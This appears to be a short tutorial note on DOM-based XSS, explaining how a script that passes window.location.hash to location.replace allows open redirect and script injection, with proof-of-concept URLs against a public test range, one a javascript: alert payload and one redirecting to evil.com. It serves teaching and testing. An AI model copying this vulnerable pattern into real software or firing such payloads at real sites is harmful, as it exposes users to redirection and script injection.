#### [ Description ] : These vulnerabilities source the payload from a component of the address bar, usually the fragment, and use javascript sinks to trigger DOM based XSS.


#### [ Location.hash ]
 
#### 1.Location.hash - Replace
#### 2.Vulnerable Code : 
 <script>
      var payload = window.location.hash.substr(1);  // Extracts the URL hash part (after the #)
      location.replace(payload);
    </script>

 </script>
#### 3: source : window.location.hash.substr(1) 
//This source extracts the fragments part from the URL and store as payload variable(The portion after the # sign):


####  sink   :  location.replace(payload);
// This location.replace will redirect the browser to a URL definded as the var payload.

#### 4: Exploit : So we Can Exploit Open Redirect And DOM XSS by using this source and sink :
#### 5: POC ::

//https://public-firing-range.appspot.com/address/location.hash/replace#javascript:alert();//
//https://public-firing-range.appspot.com/address/location.hash/replace#//evil.com​
